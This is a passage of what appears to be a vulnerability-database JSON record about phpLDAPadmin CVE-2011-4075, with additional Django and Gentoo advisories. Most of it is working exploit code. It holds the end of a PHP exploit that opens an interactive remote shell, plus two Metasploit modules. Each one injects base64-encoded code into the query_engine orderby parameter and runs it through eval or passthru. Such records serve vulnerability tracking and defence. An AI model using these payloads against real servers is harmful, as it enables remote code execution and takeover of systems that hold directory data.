\"\\n[-] No response from {$host}:80\\n\");\r\n\r\n fwrite($sock, $packet);\r\n return stream_get_contents($sock);\r\n}\r\n\r\nprint \"\\n+-------------------------------------------------------------------+\";\r\nprint \"\\n| phpLDAPadmin <= 1.2.1.1 Remote PHP Code Injection Exploit by EgiX |\";\r\nprint \"\\n+-------------------------------------------------------------------+\\n\";\r\n\r\nif ($argc < 3)\r\n{\r\n print \"\\nUsage......: php $argv[0] <host> <path>\\n\";\r\n print \"\\nExample....: php $argv[0] localhost /\";\r\n print \"\\nExample....: php $argv[0] localhost /phpldapadmin/htdocs/\\n\";\r\n die();\r\n}\r\n\r\n$host = $argv[1];\r\n$path = $argv[2];\r\n\r\n$packet = \"GET {$path}index.php HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n\";\r\n\r\nif (!preg_match(\"/Set-Cookie: ([^;]*);/\", http_send($host, $packet), $sid)) die(\"\\n[-] Session ID not found!\\n\");\r\n\r\n$phpcode = \"foo));}}error_reporting(0);print(_code_);passthru(base64_decode(\\$_SERVER[HTTP_CMD]));die;/*\";\r\n$payload = \"cmd=query_engine&query=none&search=1&orderby={$phpcode}\";\r\n\r\n$packet = \"POST {$path}cmd.php HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Cookie: {$sid[1]}\\r\\n\";\r\n$packet .= \"Cmd: %s\\r\\n\";\r\n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\";\r\n$packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n{$payload}\";\r\n\r\nwhile(1)\r\n{\r\n print \"\\nphpldapadmin-shell# \";\r\n if (($cmd = trim(fgets(STDIN))) == \"exit\") break;\r\n preg_match(\"/_code_(.*)/s\", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?\r\n print $m[1] : die(\"\\n[-] Exploit failed!\\n\");\r\n}\r\n\r\n?>\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/18021/"}, {"lastseen": "2016-02-02T09:02:55", "description": "phpLDAPadmin. CVE-2011-4075. Webapps exploit for php platform", "published": "2011-10-25T00:00:00", "type": "exploitdb", "title": "phpLDAPadmin <= 1.2.1.1 query_engine Remote PHP Code Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4075"], "modified": "2011-10-25T00:00:00", "id": "EDB-ID:18031", "href": "https://www.exploit-db.com/exploits/18031/", "sourceData": "##\r\n# $Id: phpldapadmin_query_engine.rb 14060 2011-10-25 05:25:39Z sinn3r $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Payload::Php\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the lib/functions.php that allows\r\n\t\t\t\tattackers input parsed directly to the create_function() php function. A patch was \r\n\t\t\t\tissued that uses a whitelist regex expression to check the user supplied input\r\n\t\t\t\tbefore being parsed to the create_function() call.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[ \r\n\t\t\t\t\t'EgiX <n0b0d13s[at]gmail-com>', # original discovery/poc\r\n\t\t\t\t\t'mr_me <steventhomasseeley[at]gmail-com>', # msf\r\n\t\t\t\t\t'TecR0c <roccogiovannicalvi[at]gmail-com >', # msf\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 14060 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['BID', '50331'],\r\n\t\t\t\t\t['URL', 'http://sourceforge.net/support/tracker.php?aid=3417184'],\r\n\t\t\t\t\t['URL', 'http://www.exploit-db.com/exploits/18021/'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Space' => 4000,\r\n\t\t\t\t\t'Keys' => ['php'],\r\n\t\t\t\t},\r\n\t\t\t'Platform' => ['php'],\r\n\t\t\t'Arch' => ARCH_PHP,\r\n\t\t\t'Targets' => [[ 'Automatic', { }]],\r\n\t\t\t'DisclosureDate' => 'Oct 24 2011',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptString.new('URI', [true, \"phpLDAPadmin directory path\", \"/phpldapadmin/htdocs/\"]),\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\turi = ''\r\n\t\turi << datastore['URI']\r\n\t\turi << '/' if uri[-1,1] != '/'\r\n\t\turi << 'index.php'\r\n\r\n\t\tres = send_request_raw(\r\n\t\t\t{\r\n\t\t\t\t'method' => 'GET',\r\n\t\t\t\t'uri' => uri,\r\n\t\t\t}, 3)\r\n\r\n\t\tif (res and res.body =~ /phpLDAPadmin \\(1\\.2\\.[0|1]\\.\\d/i)\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef get_session\r\n\t\turi = ''\r\n\t\turi << datastore['URI']\r\n\t\turi << '/' if uri[-1,1] != '/'\r\n\t\turi << 'index.php'\r\n\r\n\t\tres = send_request_raw(\r\n\t\t\t{\r\n\t\t\t\t'method' => 'GET',\r\n\t\t\t\t'uri' => uri,\r\n\t\t\t}, 3)\r\n\r\n\t\tif (not res.headers['Set-Cookie'])\r\n\t\t\tprint_error(\"Could not generate a valid session\")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\treturn res.headers['Set-Cookie']\r\n\tend\r\n\r\n\tdef cleanup\r\n\t\t# We may not be using php/exe again, so clear the CMD option\r\n\t\tif datastore['CMD']\r\n\t\t\tdatastore['CMD'] = nil\r\n\t\tend\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t# if we are using the exec CMD stager\r\n\t\t# important to check which php functions are disabled\r\n\t\tif datastore['CMD']\r\n\t\t\tcmd = Rex::Text.encode_base64(datastore['CMD'])\r\n\t\t\tdis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)\r\n\t\t\tout = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)\r\n\t\t\tshell = <<-END_OF_PHP_CODE\r\n\t\t\t$c = base64_decode(\"#{cmd}\");\r\n\t\t\t#{php_preamble({:disabled_varname => dis})}\r\n\t\t\t#{php_system_block({:cmd_varname=>\"$c\", :disabled_varname => dis, :output_varname => out})}\r\n\t\t\techo #{out};\r\n\t\t\tEND_OF_PHP_CODE\r\n\t\t\tp = Rex::Text.encode_base64(Rex::Text.compress(shell))\r\n\t\telse\r\n\t\t\tp = Rex::Text.encode_base64(payload.encoded)\r\n\t\tend\r\n\r\n\t\t# Generate some random strings\r\n\t\thidden_header = rand_text_alpha_upper(6)\r\n\t\tfake_func_name = rand_text_alpha_upper(2)\r\n\r\n\t\t# build sttack string\r\n\t\tphp_code = \"#{fake_func_name}));}}error_reporting(0);eval(base64_decode(\\$_SERVER[HTTP_#{hidden_header}]));die;/*\"\r\n\t\tdata = \"cmd=query_engine&query=none&search=1&orderby=#{php_code}\\r\\n\\r\\n\"\r\n\t\tsession = get_session\r\n\r\n\t\turi = ''\r\n\t\turi << datastore['URI']\r\n\t\turi << '/' if uri[-1,1] != '/'\r\n\t\turi << 'cmd.php'\r\n\r\n\t\tres = send_request_cgi(\r\n\t\t\t{\r\n\t\t\t\t'method' => 'POST',\r\n\t\t\t\t'uri' => uri,\r\n\t\t\t\t'data' => data,\r\n\t\t\t\t'headers' =>\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t\"#{hidden_header}\" => p,\r\n\t\t\t\t\t\t'Cookie' => session,\r\n\t\t\t\t\t\t'Connection' => 'Close',\r\n\t\t\t\t\t},\r\n\t\t\t\t\r\n\t\t\t}, 3)\r\n\r\n\t\tprint_status(\"%s\" % res.body) if datastore['CMD']\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/18031/"}], "github": [{"lastseen": "2020-03-10T23:26:15", "bulletinFamily": "software", "cvelist": ["CVE-2011-4137"], "description": "The verify_exists functionality in the URLField implementation in Django before 1.2.7 and 1.3.x before 1.3.1 relies on Python libraries that attempt access to an arbitrary URL with no timeout, which allows remote attackers to cause a denial of service (resource consumption) via a URL associated with (1) a slow response, (2) a completed TCP connection with no application data sent, or (3) a large amount of application data, a related issue to CVE-2011-1521.", "edition": 2, "modified": "2019-07-03T21:02:01", "published": "2018-07-23T19:51:35", "id": "GHSA-3JQW-CRQJ-W8QW", "href": "https://github.com/advisories/GHSA-3jqw-crqj-w8qw", "title": "Moderate severity vulnerability that affects django", "type": "github", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-03-10T23:26:15", "bulletinFamily": "software", "cvelist": ["CVE-2011-4140"], "description": "The CSRF protection mechanism in Django through 1.2.7 and 1.3.x through 1.3.1 does not properly handle web-server configurations supporting arbitrary HTTP Host headers, which allows remote attackers to trigger unauthenticated forged requests via vectors involving a DNS CNAME record and a web page containing JavaScript code.", "edition": 2, "modified": "2019-07-03T21:02:01", "published": "2018-07-23T19:51:19", "id": "GHSA-H95J-H2RV-QRG4", "href": "https://github.com/advisories/GHSA-h95j-h2rv-qrg4", "title": "Moderate severity vulnerability that affects django", "type": "github", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-10T23:26:15", "bulletinFamily": "software", "cvelist": ["CVE-2011-4136"], "description": "django.contrib.sessions in Django before 1.2.7 and 1.3.x before 1.3.1, when session data is stored in the cache, uses the root namespace for both session identifiers and application-data keys, which allows remote attackers to modify a session by triggering use of a key that is equal to that session's identifier.", "edition": 2, "modified": "2019-07-03T21:02:01", "published": "2018-07-23T19:52:39", "id": "GHSA-X88J-93VC-WPMP", "href": "https://github.com/advisories/GHSA-x88j-93vc-wpmp", "title": "Moderate severity vulnerability that affects django", "type": "github", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-10-13T00:54:29", "description": "This module exploits a vulnerability in the lib/functions.php for phpLDAPadmin versions 1.2.1.1 and earlier that allows attackers input parsed directly to the create_function() php function. A patch was issued that uses a whitelist regex expression to check the user supplied input before being parsed to the create_function() call.\n", "published": "2011-10-24T23:22:32", "type": "metasploit", "title": "phpLDAPadmin query_engine Remote PHP Code Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4075"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/PHPLDAPADMIN_QUERY_ENGINE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'phpLDAPadmin query_engine Remote PHP Code Injection',\n 'Description' => %q{\n This module exploits a vulnerability in the lib/functions.php for\n phpLDAPadmin versions 1.2.1.1 and earlier that allows attackers input\n parsed directly to the create_function() php function. A patch was\n issued that uses a whitelist regex expression to check the user supplied\n input before being parsed to the create_function() call.\n },\n 'Author' =>\n [\n 'EgiX <n0b0d13s[at]gmail.com>', # original discovery/poc\n 'mr_me <steventhomasseeley[at]gmail.com>', # msf\n 'TecR0c <roccogiovannicalvi[at]gmail.com >', # msf\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2011-4075'],\n ['OSVDB', '76594'],\n ['BID', '50331'],\n ['EDB', '18021']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Space' => 4000,\n 'Keys' => ['php'],\n },\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' => [[ 'Automatic', { }]],\n 'DisclosureDate' => '2011-10-24',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('URI', [true, \"phpLDAPadmin directory path\", \"/phpldapadmin/htdocs/\"]),\n ])\n end\n\n def check\n uri = normalize_uri(datastore['URI'], 'index.php')\n\n res = send_request_raw(\n {\n 'method' => 'GET',\n 'uri' => uri,\n }, 3)\n\n if (res and res.body =~ /phpLDAPadmin \\(1\\.2\\.[0|1]\\.\\d/i)\n return Exploit::CheckCode::Appears\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def get_session\n uri = normalize_uri(datastore['URI'], 'index.php')\n\n res = send_request_raw(\n {\n 'method' => 'GET',\n 'uri' => uri,\n }, 3)\n\n if res.nil? or res.get_cookies.empty?\n print_error(\"Could not generate a valid session\")\n return\n end\n\n return res.get_cookies\n end\n\n def exploit\n # if we are using the exec CMD stager\n # important to check which php functions are disabled\n if datastore['CMD']\n p = \"passthru(\\\"%s\\\");\" % datastore['CMD']\n p = Rex::Text.encode_base64(p)\n else\n p = Rex::Text.encode_base64(payload.encoded)\n end\n\n # Generate some random strings\n hidden_header = rand_text_alpha_upper(6)\n fake_func_name = rand_text_alpha_upper(2)\n\n # build sttack string\n php_code = \"#{fake_func_name}));}}error_reporting(0);eval(base64_decode(\\$_SERVER[HTTP_#{hidden_header}]));die;/*\"\n data = \"cmd=query_engine&query=none&search=1&orderby=#{php_code}\\r\\n\\r\\n\"\n session = get_session\n\n uri = normalize_uri(datastore['URI'])\n uri << '/' if uri[-1,1] != '/'\n uri << 'cmd.php'\n\n res = send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => uri,\n 'data' => data,\n 'headers' =>\n {\n \"#{hidden_header}\" => p,\n 'Cookie' => session,\n 'Connection' => 'Close',\n },\n }, 3)\n\n print_status(\"%s\" % res.body) if datastore['CMD']\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/phpldapadmin_query_engine.rb"}], "dsquare": [{"lastseen": "2019-05-29T15:31:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4075"], "description": "Remote command execution vulnerability in phpLDAPadmin query_engine\n\nVulnerability Type: Remote Command Execution", "modified": "2013-04-02T00:00:00", "published": "2012-01-29T00:00:00", "id": "E-25", "href": "", "type": "dsquare", "title": "phpLDAPadmin 1.2.1.1 RCE", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:08", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2688"], "description": "### Background\n\nmod_authnz_external is a tool for creating custom authentication backends for HTTP basic authentication. \n\n### Description\n\nmysql/mysql-auth.pl in mod_authnz_external does not properly sanitize input before using it in an SQL query. \n\n### Impact\n\nA remote attacker could exploit this vulnerability to inject arbitrary SQL statements by using a specially crafted username for HTTP authentication on a site using mod_authnz_external. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Apache mod_authnz_external users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-apache/mod_authnz_external-3.2.6\"", "edition": 1, "modified": "2011-10-25T00:00:00", "published": "2011-10-25T00:00:00", "id": "GLSA-201110-23", "href": "https://security.gentoo.org/glsa/201110-23", "type": "gentoo", "title": "Apache mod_authnz_external: SQL injection", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}